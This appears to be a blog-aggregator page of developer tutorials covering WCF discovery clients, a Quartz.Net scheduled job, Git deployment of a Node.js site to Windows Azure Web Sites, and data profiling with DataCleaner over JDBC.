ServiceDiscoveryBehavior utilizes a service extension and the channel dispatcher to implement the announcement logic. In short, it hooks into the channel open and close procedures and sends the online and offline messages to the announcement endpoint.

On the client side, once we have the discovery service, a client can invoke a service without knowing its endpoint.
The WCF discovery assembly provides a class named DiscoveryClient, which can be used to find the proper service endpoint by passing criteria. In the code below I initialize a DiscoveryClient with the discovery service probe endpoint address, create the find criteria from the service contract I want to use, and invoke the Find method. This sends the probe message to the discovery service, which sends the matching endpoints back to me. The discovery service returns all endpoints that match the find criteria, so the result of the Find method may contain more than one endpoint. In this example I simply return the first match. In the next post I will show how to extend our discovery service to make it work like a service load balancer.

static EndpointAddress FindServiceEndpoint()
{
    var probeEndpointAddress = new EndpointAddress(ConfigurationManager.AppSettings["probeEndpointAddress"]);
    var probeBinding = Activator.CreateInstance(Type.GetType(ConfigurationManager.AppSettings["bindingType"], true, true)) as Binding;
    var discoveryEndpoint = new DiscoveryEndpoint(probeBinding, probeEndpointAddress);

    EndpointAddress address = null;
    FindResponse result = null;
    using (var discoveryClient = new DiscoveryClient(discoveryEndpoint))
    {
        result = discoveryClient.Find(new FindCriteria(typeof(IStringService)));
    }

    if (result != null && result.Endpoints.Any())
    {
        var endpointMetadata = result.Endpoints.First();
        address = endpointMetadata.Address;
    }
    return address;
}

Once we have probed the discovery service, we receive the endpoint, so in the client code we can create a channel factory from the endpoint and binding and invoke the service. When creating the client-side channel factory, we need to make sure the client-side binding is the same as the service side. A WCF discovery service can be used to find the endpoint for a service contract, but the binding is NOT included, because bindings are not part of the WS-Discovery specification. In the next post I will demonstrate how to add binding information to the discovery service; at that point the client won’t need to create the binding by itself, but will use the binding received from the discovery service.

static void Main(string[] args)
{
    Console.WriteLine("Say something...");
    var content = Console.ReadLine();
    while (!string.IsNullOrWhiteSpace(content))
    {
        Console.WriteLine("Finding the service endpoint...");
        var address = FindServiceEndpoint();
        if (address == null)
        {
            Console.WriteLine("There is no endpoint that matches the criteria.");
        }
        else
        {
            Console.WriteLine("Found the endpoint {0}", address.Uri);

            var factory = new ChannelFactory<IStringService>(new NetTcpBinding(), address);
            factory.Opened += (sender, e) =>
            {
                Console.WriteLine("Connecting to {0}.", factory.Endpoint.ListenUri);
            };
            var proxy = factory.CreateChannel();
            using (proxy as IDisposable)
            {
                Console.WriteLine("ToUpper: {0} => {1}", content, proxy.ToUpper(content));
            }
        }

        Console.WriteLine("Say something...");
        content = Console.ReadLine();
    }
}

As a taste of the load-balancing idea, the sketch below shows one naive way to spread requests across all returned endpoints instead of always taking the first.
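This is only an illustrative sketch, not the approach the author develops in the next post: picking a random endpoint from the FindResponse distributes calls roughly evenly across the discovered service instances.

// Illustrative sketch only: pick a random endpoint from the probe result
// so repeated calls are spread across all discovered service instances.
// (In real code, reuse a single Random instance instead of creating one per call.)
static EndpointAddress PickRandomEndpoint(FindResponse result)
{
    if (result == null || result.Endpoints.Count == 0)
    {
        return null;
    }
    var random = new Random();
    var endpointMetadata = result.Endpoints[random.Next(result.Endpoints.Count)];
    return endpointMetadata.Address;
}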
Similarly, the discovery service probe endpoint and binding are defined in the configuration file.

<?xml version="1.0"?>
<configuration>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/>
  </startup>
  <appSettings>
    <add key="announcementEndpointAddress" value="net.tcp://localhost:10010/announcement"/>
    <add key="probeEndpointAddress" value="net.tcp://localhost:10011/probe"/>
    <add key="bindingType" value="System.ServiceModel.NetTcpBinding, System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"/>
  </appSettings>
</configuration>

OK, now let’s have a test. First start the discovery service, then start our discoverable service. When it starts, it announces itself to the discovery service and registers its endpoint in the repository, which here is the local dictionary. Then start the client and type something: the client asks the discovery service for the endpoint and then establishes a connection to the discoverable service. More interestingly, do NOT close the client console; instead, terminate the discoverable service by pressing the Enter key. This makes the service send the offline message to the discovery service. Then start the discoverable service again. Since we made it use a different address each time it starts, it is now hosted at another address. If we enter something in the client, we can see that it asks the discovery service, retrieves the new endpoint, and connects to the service.

Summary

In this post I discussed the benefits of using a discovery service and the procedures of service announcement and probe. I also demonstrated how to leverage the WCF Discovery feature in WCF 4.0 to build a simple managed discovery service. For test purposes, this example used an in-memory dictionary as the discovery endpoint metadata repository, and the find implementation simply returned the first matching endpoint. I also hard-coded the bindings shared by the discoverable service and the client. In the next post I will show how to solve the problems mentioned above, as well as some additional features for production usage. You can download the code here.

Hope this helps,
Shaun

All documents, related graphics and code are provided "AS IS" without warranty of any kind. Copyright © Shaun Ziyan Xu. This work is licensed under the Creative Commons License.

    Read the article

  • Quartz.Net Writing your first Hello World Job

    - by Tarun Arora
    In this blog post I’ll be covering:
01: A few things to consider before you schedule a job using Quartz.Net
02: Setting up your solution to use the Quartz.Net API
03: Quartz.Net configuration
04: Writing and scheduling a hello world job with Quartz.Net

If you are new to Quartz.Net I would recommend going through:
A brief introduction to Quartz.net
Walkthrough of Installing & Testing Quartz.Net as a Windows Service

A few things to consider before you schedule a Job using Quartz.Net:
- An instance of the scheduler service
- A trigger
- And last but not the least, a job

For example, if I wanted to schedule a script to run on the server, I would jot down answers to the questions below:
a. Considering there are multiple machines set up with the Quartz.Net windows service, how can I choose the instance of Quartz.Net where I want my script to be run?
b. What will trigger the execution of the job?
c. How often do I want the job to run?
d. Do I want the job to run right away, start after a delay, or start at a specific time?
e. What will happen to my job if the Quartz.Net windows service is reset?
f. Do I want multiple instances of this job to run concurrently?
g. Can I pass parameters to the job being executed by the Quartz.Net windows service?

Setting up your solution to use the Quartz.Net API

1. Create a new C# Console Application project, call it "HelloWorldQuartzDotNet", and add a reference to Quartz.Net.dll. I use the NuGet Package Manager to add the reference. This can be done by right-clicking References and choosing Manage NuGet Packages; from the NuGet Package Manager choose Online from the left panel, and in the search box on the right search for Quartz.Net. Click Install on the package "Quartz" (screen shot below).

2. Right-click the project and choose Add New Item. Add a new interface and call it 'IScheduledJob.cs'. Mark the interface public and add the signature for Run. Your interface should look like this:

namespace HelloWorldQuartzDotNet
{
    public interface IScheduledJob
    {
        void Run();
    }
}

3. Right-click the project and choose Add New Item. Add a class and call it 'ScheduledJob'. Use this class to implement the interface 'IScheduledJob.cs'. Look at the pseudo code in the implementation of the Run method:

using System;

namespace HelloWorldQuartzDotNet
{
    class ScheduledJob : IScheduledJob
    {
        public void Run()
        {
            // Get an instance of the Quartz.Net scheduler
            // Define the Job to be scheduled
            // Associate a trigger with the Job
            // Assign the Job to the scheduler
            throw new NotImplementedException();
        }
    }
}

One of the questions above, (g), passing parameters to a job, can already be answered here; a hedged sketch follows.
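The sketch below shows one way to pass parameters via the JobDataMap; the key name "targetServer" and the class name are illustrative assumptions, not part of the original walkthrough.

using Quartz;
using System;

namespace HelloWorldQuartzDotNet
{
    // Sketch for question (g): parameters travel with the job in its JobDataMap.
    class ParameterisedJob : IJob
    {
        public void Execute(IJobExecutionContext context)
        {
            // MergedJobDataMap combines job-level and trigger-level entries
            var target = context.MergedJobDataMap.GetString("targetServer");
            Console.WriteLine("Running against {0}", target);
        }
    }

    // When building the job, attach the data like this:
    //   var job = JobBuilder.Create<ParameterisedJob>()
    //       .WithIdentity("ParameterisedJob", "IT")
    //       .UsingJobData("targetServer", "SRV01")
    //       .Build();
}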
I’ll get into the implementation in more detail, but first let’s look at the minimal configuration file the Quartz.Net service needs to work.

Quartz.Net configuration

In the App.config file, copy the configuration below:

<?xml version="1.0" encoding="utf-8" ?>
<configuration>
  <configSections>
    <section name="quartz" type="System.Configuration.NameValueSectionHandler, System, Version=1.0.5000.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
  </configSections>
  <quartz>
    <add key="quartz.scheduler.instanceName" value="ServerScheduler" />
    <add key="quartz.threadPool.type" value="Quartz.Simpl.SimpleThreadPool, Quartz" />
    <add key="quartz.threadPool.threadCount" value="10" />
    <add key="quartz.threadPool.threadPriority" value="2" />
    <add key="quartz.jobStore.misfireThreshold" value="60000" />
    <add key="quartz.jobStore.type" value="Quartz.Simpl.RAMJobStore, Quartz" />
  </quartz>
</configuration>

As you can see in the configuration above, I have included the instance name of the Quartz scheduler; the thread pool type, count and priority; and the job store type, which has been set to RAM. You also have the option of configuring an ADO.NET job store. More details here.

Writing & scheduling a hello world job with Quartz.Net

Once fully implemented, the ScheduledJob.cs class should look like the code below. I’ll walk you through the details of the implementation:
- GetScheduler() uses the name of the Quartz.Net instance and listens on localhost port 555 to try to connect to the Quartz.Net windows service.
- Run() attempts to start the scheduler in case it is in standby mode.
- I have defined a job "WriteHelloToConsole" (that’s the name of the job); this job belongs to the group "IT". Think of a group as a logical grouping feature: it helps you bucket jobs, and Quartz.Net gives you the ability to pause or delete all jobs in a group (we’ll look at that in a future post). I have requested recovery of this job in case the Quartz.Net service fails over to the other node in the cluster. The job type is "HelloWorldJob"; this is the class that will be called to execute the job (more details on this below).
- I have defined a trigger for my job, also called "WriteHelloToConsole". The trigger works on the cron schedule "0 0/1 * 1/1 * ? *", which fires the job once every minute. I would recommend www.cronmaker.com, a free and great website to build and parse cron expressions. The trigger has priority 1, so if two jobs fire at the same time, this trigger has the higher priority and runs first.
- Finally, the Job and Trigger are used to schedule the job. This method returns a DateTimeOffset, from which you can see the next fire time for the job.

using System.Collections.Specialized;
using System.Configuration;
using Quartz;
using System;
using Quartz.Impl;

namespace HelloWorldQuartzDotNet
{
    class ScheduledJob : IScheduledJob
    {
        public void Run()
        {
            // Get an instance of the Quartz.Net scheduler
            var schd = GetScheduler();

            // Start the scheduler if it is in standby
            if (!schd.IsStarted)
                schd.Start();

            // Define the Job to be scheduled
            var job = JobBuilder.Create<HelloWorldJob>()
                .WithIdentity("WriteHelloToConsole", "IT")
                .RequestRecovery()
                .Build();

            // Associate a trigger with the Job
            var trigger = (ICronTrigger)TriggerBuilder.Create()
                .WithIdentity("WriteHelloToConsole", "IT")
                .WithCronSchedule("0 0/1 * 1/1 * ? *") // visit http://www.cronmaker.com/ - queues the job every minute
                .WithPriority(1)
                .Build();

            // Assign the Job to the scheduler
            var schedule = schd.ScheduleJob(job, trigger);
            Console.WriteLine("Job '{0}' scheduled for '{1}'", job.Key, schedule.ToString("r"));
        }

        // Get an instance of the Quartz.Net scheduler
        private static IScheduler GetScheduler()
        {
            try
            {
                var properties = new NameValueCollection();
                properties["quartz.scheduler.instanceName"] = "ServerScheduler";
                // set remoting exporter
                properties["quartz.scheduler.proxy"] = "true";
                properties["quartz.scheduler.proxy.address"] = string.Format("tcp://{0}:{1}/{2}", "localhost", "555", "QuartzScheduler");

                // Get a reference to the scheduler
                var sf = new StdSchedulerFactory(properties);
                return sf.GetScheduler();
            }
            catch (Exception ex)
            {
                Console.WriteLine("Scheduler not available: '{0}'", ex.Message);
                throw;
            }
        }
    }
}

The highlighted values above are taken from the Quartz.config file, which is available in the Quartz.Net server installation directory. Before moving on to the job class, question (f) from the considerations list, whether multiple instances of a job may run concurrently, deserves a quick aside; a hedged sketch follows.
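A sketch (not from the original post) of how Quartz.Net can prevent overlapping runs: decorating the job class with the DisallowConcurrentExecution attribute tells the scheduler not to execute two instances of the same job definition at the same time.

using Quartz;

namespace HelloWorldQuartzDotNet
{
    // Sketch for question (f): with this attribute, a new firing of the job
    // waits until the currently running instance has finished.
    [DisallowConcurrentExecution]
    class NonOverlappingJob : IJob
    {
        public void Execute(IJobExecutionContext context)
        {
            // long-running work that must not overlap with itself
        }
    }
}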
*") // visit http://www.cronmaker.com/ Queues the job every minute .WithPriority(1) .Build(); // Assign the Job to the scheduler var schedule = schd.ScheduleJob(job, trigger); Console.WriteLine("Job '{0}' scheduled for '{1}'", "", schedule.ToString("r")); } // Get an instance of the Quartz.Net scheduler private static IScheduler GetScheduler() { try { var properties = new NameValueCollection(); properties["quartz.scheduler.instanceName"] = "ServerScheduler"; // set remoting expoter properties["quartz.scheduler.proxy"] = "true"; properties["quartz.scheduler.proxy.address"] = string.Format("tcp://{0}:{1}/{2}", "localhost", "555", "QuartzScheduler"); // Get a reference to the scheduler var sf = new StdSchedulerFactory(properties); return sf.GetScheduler(); } catch (Exception ex) { Console.WriteLine("Scheduler not available: '{0}'", ex.Message); throw; } } } }   The above highlighted values have been taken from the Quartz.config file, this file is available in the Quartz.net server installation directory. Implementation of my HelloWorldJob Class below. The HelloWorldJob class gets called to execute the job “WriteHelloToConsole” using the once every minute trigger set up for this job. The HelloWorldJob is a class that implements the interface IJob. I’ll walk you through the details of the implementation… - context is passed to the method execute by the quartz.net scheduler service. This has everything you need to pull out the job, trigger specific information. - for example. I have pulled out the value of the jobKey name, the fire time and next fire time. using Quartz; using System; namespace HelloWorldQuartzDotNet { class HelloWorldJob : IJob { public void Execute(IJobExecutionContext context) { try { Console.WriteLine("Job {0} fired @ {1} next scheduled for {2}", context.JobDetail.Key, context.FireTimeUtc.Value.ToString("r"), context.NextFireTimeUtc.Value.ToString("r")); Console.WriteLine("Hello World!"); } catch (Exception ex) { Console.WriteLine("Failed: {0}", ex.Message); } } } }   I’ll add a call to call the scheduler in the Main method in Program.cs using System; using System.Threading; namespace HelloWorldQuartzDotNet { class Program { static void Main(string[] args) { try { var sj = new ScheduledJob(); sj.Run(); Thread.Sleep(10000 * 10000); } catch (Exception ex) { Console.WriteLine("Failed: {0}", ex.Message); } } } }   This was third in the series of posts on enterprise scheduling using Quartz.net, in the next post I’ll be covering how to pass parameters to the scheduled task scheduled on Quartz.net windows service. Thank you for taking the time out and reading this blog post. If you enjoyed the post, remember to subscribe to http://feeds.feedburner.com/TarunArora. Stay tuned!

    Read the article

  • Building and Deploying Windows Azure Web Sites using Git and GitHub for Windows

    - by shiju
    The Microsoft Windows Azure team has released a new version of Windows Azure with many excellent features. The new Windows Azure provides Web Sites, which allow you to deploy up to 10 web sites for free in a multitenant shared environment, and you can easily upgrade a web site to a private, dedicated virtual server when traffic grows. The Meet Windows Azure Fact Sheet provides the following information about a Windows Azure Web Site:

Windows Azure Web Sites enable developers to easily build and deploy websites with support for multiple frameworks and popular open source applications, including ASP.NET, PHP and Node.js. With just a few clicks, developers can take advantage of Windows Azure’s global scale without having to worry about operations, servers or infrastructure. It is easy to deploy existing sites, if they run on Internet Information Services (IIS) 7, or to build new sites, with a free offer of 10 websites upon signup, with the ability to scale up as needed with reserved instances.

Windows Azure Web Sites includes support for the following:
Multiple frameworks including ASP.NET, PHP and Node.js
Popular open source software apps including WordPress, Joomla!, Drupal, Umbraco and DotNetNuke
Windows Azure SQL Database and MySQL databases
Multiple types of developer tools and protocols including Visual Studio, Git, FTP, Visual Studio Team Foundation Services and Microsoft WebMatrix

Sign up for Windows Azure and Enable Web Sites

You can sign up for a 90-day free trial account in Windows Azure from here. After creating an account in Windows Azure, go to https://account.windowsazure.com/ and select "preview features" to view the available previews. In the Web Sites section of the preview features, click "try it now", which enables the Web Sites feature.

Create a Web Site in Windows Azure

To create a web site, log in to the Windows Azure portal, select Web Sites, and click the New icon in the left corner. Click WEB SITE, QUICK CREATE and fill in the URL and REGION dropdown. You can see all your web sites from the dashboard of the Windows Azure portal.

Set up Git Publishing

Select your web site from the dashboard and select Set up Git publishing. To enable Git publishing, you must give a user name and password, which will initialize a Git repository.

Clone the Git Repository

We can use GitHub for Windows to publish apps to non-GitHub repositories, which is well explained by Phil Haack on his blog post. Here we are going to deploy the web site using GitHub for Windows. Let’s clone the Git repository using the Git URL we get from the Windows Azure portal: copy the Git URL and execute "git clone" with it. You can use the Git Shell provided by GitHub for Windows; to get it, right-click on GitHub for Windows and select "open shell here" as shown in the picture below. When executing the git clone command, it will ask for a password; give the password specified in the Windows Azure portal. After cloning the Git repository, you can drag and drop the local repository folder onto the GitHub for Windows GUI. This automatically adds the Windows Azure Web Site repository to GitHub for Windows, where you can commit your changes and publish your web site to Windows Azure.

Publish the Web Site using GitHub for Windows

We can add files for any of the supported frameworks, including ASP.NET, PHP and Node.js, to the local repository folder and easily publish them to Windows Azure from the GitHub for Windows GUI.
For this demo, let me just add a simple Node.js file named Server.js which wires up a few request handlers.

var http = require('http');
var port = process.env.PORT;
var querystring = require('querystring');
var utils = require('util');
var url = require("url");

var server = http.createServer(function(req, res) {
    switch (req.url) { // checking the request url
        case '/':
            homePageHandler(req, res); // handler for home page
            break;
        case '/register':
            registerFormHandler(req, res); // handler for register
            break;
        default:
            nofoundHandler(req, res); // handler for 404 not found
            break;
    }
});
server.listen(port);

// function to display the html form
function homePageHandler(req, res) {
    console.log('Request handler home was called.');
    res.writeHead(200, {'Content-Type': 'text/html'});
    var body = '<html>' +
        '<head>' +
        '<meta http-equiv="Content-Type" content="text/html; ' +
        'charset=UTF-8" />' +
        '</head>' +
        '<body>' +
        '<form action="/register" method="post">' +
        'Name:<input type=text value="" name="name" size=15></br>' +
        'Email:<input type=text value="" name="email" size=15></br>' +
        '<input type="submit" value="Submit" />' +
        '</form>' +
        '</body>' +
        '</html>';
    // response content
    res.end(body);
}

// handler for Post request
function registerFormHandler(req, res) {
    console.log('Request handler register was called.');
    var pathname = url.parse(req.url).pathname;
    console.log("Request for " + pathname + " received.");
    var postData = "";
    req.on('data', function(chunk) {
        // append the current chunk of data to the postData variable
        postData += chunk.toString();
    });
    req.on('end', function() {
        // doing something with the posted data
        res.writeHead(200, "OK", {'Content-Type': 'text/html'});
        // parse the posted data
        var decodedBody = querystring.parse(postData);
        // output the decoded data to the HTTP response
        res.write('<html><head><title>Post data</title></head><body><pre>');
        res.write(utils.inspect(decodedBody));
        res.write('</pre></body></html>');
        res.end();
    });
}

// Error handler for 404 not found
function nofoundHandler(req, res) {
    console.log('Request handler nofound was called.');
    res.writeHead(404, {'Content-Type': 'text/plain'});
    res.end('404 Error - Request handler not found');
}

If there is any change in the local repository folder, GitHub for Windows will automatically detect it. In the step above we have just added a Server.js file, so GitHub for Windows will detect the change. Let's commit the changes to the local repository before publishing the web site to Windows Azure. After committing all the changes, you can click the publish button, which will publish all the changes to the Windows Azure repository.
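Incidentally, you can sanity-check these handlers locally before pushing. A quick sketch, assuming Node.js and curl are installed on your machine; the port number and form values are made up for illustration (Windows Azure injects the real PORT value at runtime):

REM in one command prompt: pick a port and start the server
set PORT=3000
node Server.js

REM in another: hit the home page, then post to the register handler
curl http://localhost:3000/
curl -d "name=Shiju&email=shiju@example.com" http://localhost:3000/register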
The following screen shot shows the deployment history in the Windows Azure portal. GitHub for Windows provides a sync button which can be used to synchronize the local repository with the Windows Azure repository after any commit is made on the local repository. Our web site is running after the deployment using Git.

Summary

Windows Azure Web Sites lets developers easily build and deploy websites with support for multiple frameworks including ASP.NET, PHP and Node.js, and the sites can easily be deployed using Visual Studio, Git, FTP, Visual Studio Team Foundation Services and Microsoft WebMatrix. In this demo, we have deployed a Node.js web site to Windows Azure using Git. We can use GitHub for Windows to publish apps to non-GitHub repositories, and can use it to publish Web Sites to Windows Azure.

    Read the article

  • Data Profiling without SSIS

Strangely enough for a predominantly SSIS blog, this post is all about how to perform data profiling without using SSIS. Whilst the Data Profiling Task is a worthy addition, there are a couple of limitations I've encountered of late. The first is that it requires SQL Server 2008, and not everyone is there yet. The second is that it can only target SQL Server 2005 and above. What about older systems, which are the ones that we probably need to investigate the most, or other vendor databases such as Oracle?

With these limitations in mind I did some searching to find a quick and easy alternative to help me perform some data profiling for a project I was working on recently. I only had SQL Server 2005 available, and anyway most of my target source systems were Oracle, and of course I had short timescales. I looked at several options. Some never got beyond the download stage, they failed to install or just did not run, and others provided less than I could have produced myself by spending 2 minutes writing some basic SQL queries. In the end I settled on an open source product called DataCleaner. To quote from their website:

DataCleaner is an Open Source application for profiling, validating and comparing data. These activities help you administer and monitor your data quality in order to ensure that your data is useful and applicable to your business situation. DataCleaner is the free alternative to software for master data management (MDM) methodologies, data warehousing (DW) projects, statistical research, preparation for extract-transform-load (ETL) activities and more. DataCleaner is developed in Java and licensed under LGPL.

As quoted above it claims to support profiling, validating and comparing data, but I didn't really get past the profiling functions, so I won't comment on the other two. The profiling, whilst not perfect, certainly saved some time compared to the limited alternatives. The ability to profile heterogeneous data sources is a big advantage over the SSIS option, and I found it overall quite easy to use, and performance was good. I could see it struggling at times, but actually for what it does I was impressed. It had some data type niggles with Oracle, and some metrics seem a little strange, although thankfully they were easy to augment with some SQL queries to ensure a consistent picture (a short sketch of the kind of query I mean appears at the end of this post). The report export options didn't do it for me, but copy and paste with a bit of Excel magic was sufficient.

One initial point for me personally is that I have had limited exposure to things of the Java persuasion, and whilst I normally get by fine, sometimes the simplest things can throw me. For example, installing a JDBC driver: why do I have to copy files to make it all work, has nobody ever heard of an MSI? In case there are other people out there like me who have become totally indoctrinated with the Microsoft software paradigm, I've written a quick start guide that details every step required. Steps 1-5 are the key ones; the rest is really an excuse for some screenshots to show you the tool.

Quick Start Guide

Step 1 - Download DataCleaner. Take the Microsoft Windows zipped exe option; I chose the latest stable build, currently DataCleaner 1.5.3 (final). Extract the files to a suitable location.

Step 2 - Download Java. If you try to run datacleaner.exe without Java it will warn you, then open your default browser and take you to the Java download site. Follow the installation instructions from there; normally just click Download Java a couple of times and you're done.
Step 3 - Download the Microsoft SQL Server JDBC Driver. You may have SQL Server installed, but you won't have a JDBC driver. Version 3.0 is the latest as of April 2010. There is no real installer, we are in the Java world here, but run the exe you downloaded to extract the files. The default Unzip to folder is not much help, so try a fully qualified path such as C:\Program Files\Microsoft SQL Server JDBC Driver 3.0\ to ensure you can find the files afterwards.

Step 4 - If you wish to use Windows Authentication to connect to your SQL Server then first we need to copy a file so that DataCleaner can find it. Browse to the JDBC extract location from Step 3 and drill down to the file sqljdbc_auth.dll. You will have to choose the correct directory for your processor architecture, e.g. C:\Program Files\Microsoft SQL Server JDBC Driver 3.0\sqljdbc_3.0\enu\auth\x86\sqljdbc_auth.dll. Now copy this file to the DataCleaner extract folder you chose in Step 1. An alternative method is to edit datacleaner.cmd in the DataCleaner extract folder as detailed in this DataCleaner wiki topic, but I find copying the file simpler.

Step 5 - Now let's run DataCleaner; just run datacleaner.exe from the extract folder you chose in Step 1.

Step 6 - Complete or skip the registration screen, and ignore the task window for now. In the main window click Settings.

Step 7 - In the Settings dialog, select the Database drivers tab, then click Register database driver and select the Local JAR file option.

Step 8 - Browse to the JDBC driver extract location from Step 3 and drill down to select sqljdbc4.jar, e.g. C:\Program Files\Microsoft SQL Server JDBC Driver 3.0\sqljdbc_3.0\enu\sqljdbc4.jar.

Step 9 - Select the Database driver class as com.microsoft.sqlserver.jdbc.SQLServerDriver, and then click the Test and Save database driver button.

Step 10 - You should be back at the Settings dialog with a list of drivers that includes SQL Server. Just click Save Settings to persist all your hard work.

Step 11 - Now we can start to profile some data. In the main DataCleaner window click New Task, and then Profile from the task window.

Step 12 - In the Profile window click Open Database.

Step 13 - Now choose the SQL Server connection string option. Selecting a connection string gives us a template like jdbc:sqlserver://<hostname>:1433;databaseName=<database>, but obviously it requires some details to be entered, for example jdbc:sqlserver://localhost:1433;databaseName=SQLBits. This will connect to the database called SQLBits on my local machine. The port may also have to be changed, such as when you have multiple instances of SQL Server running. If using SQL Server Authentication, enter a username and password as required and then click Connect to database. You can use Windows Authentication instead; just add integratedSecurity=true to the end of your connection string, e.g. jdbc:sqlserver://localhost:1433;databaseName=SQLBits;integratedSecurity=true. If you didn't complete Step 4 above you will need to do so now and restart DataCleaner before it will work. Manually setting the connection string is fine, but creating a named connection makes more sense if you will be spending any length of time profiling a specific database. As highlighted in the left-hand screenshot, the bottom of the dialog includes partial instructions on how to create named connections. In the folder shown, C:\Users\<Username>\.datacleaner\1.5.3, open the datacleaner-config.xml file in your editor of choice and add your own details.
You'll see a sample connection in the file already; just add yours following the same pattern, e.g.

<!-- Darren's Named Connections -->
<bean class="dk.eobjects.datacleaner.gui.model.NamedConnection">
  <property name="name" value="SQLBits Local Connection" />
  <property name="driverClass" value="com.microsoft.sqlserver.jdbc.SQLServerDriver" />
  <property name="connectionString" value="jdbc:sqlserver://localhost:1433;databaseName=SQLBits;integratedSecurity=true" />
  <property name="tableTypes">
    <list>
      <value>TABLE</value>
      <value>VIEW</value>
    </list>
  </property>
</bean>

Step 14 - Once back at the Profile window, you should now see your schemas, tables and/or views listed down the left-hand side. Browse this tree and double-click a table to select it for profiling. You can then click Add profile and choose some profiling options, before finally clicking Run profiling. You can see below a sample output for three of the most common profiles; click the image for full size.

I hope this has given you a taster for DataCleaner, and it should help you get up and running pretty quickly.
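As promised above, for the metrics that looked a little strange, a couple of lines of SQL gave me a consistent baseline to compare against. A minimal sketch of the kind of profiling query I mean is below; the table and column names are placeholders for your own schema, and the syntax is T-SQL (on Oracle, swap LEN for LENGTH and use your own schema prefix):

-- basic column profile: row count, distinct values, nulls, value lengths
-- dbo.Customers and CustomerName are placeholder names
SELECT
    COUNT(*) AS row_count,
    COUNT(DISTINCT CustomerName) AS distinct_values,
    SUM(CASE WHEN CustomerName IS NULL THEN 1 ELSE 0 END) AS null_count,
    MIN(LEN(CustomerName)) AS min_length,
    MAX(LEN(CustomerName)) AS max_length
FROM dbo.Customers;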

    Read the article
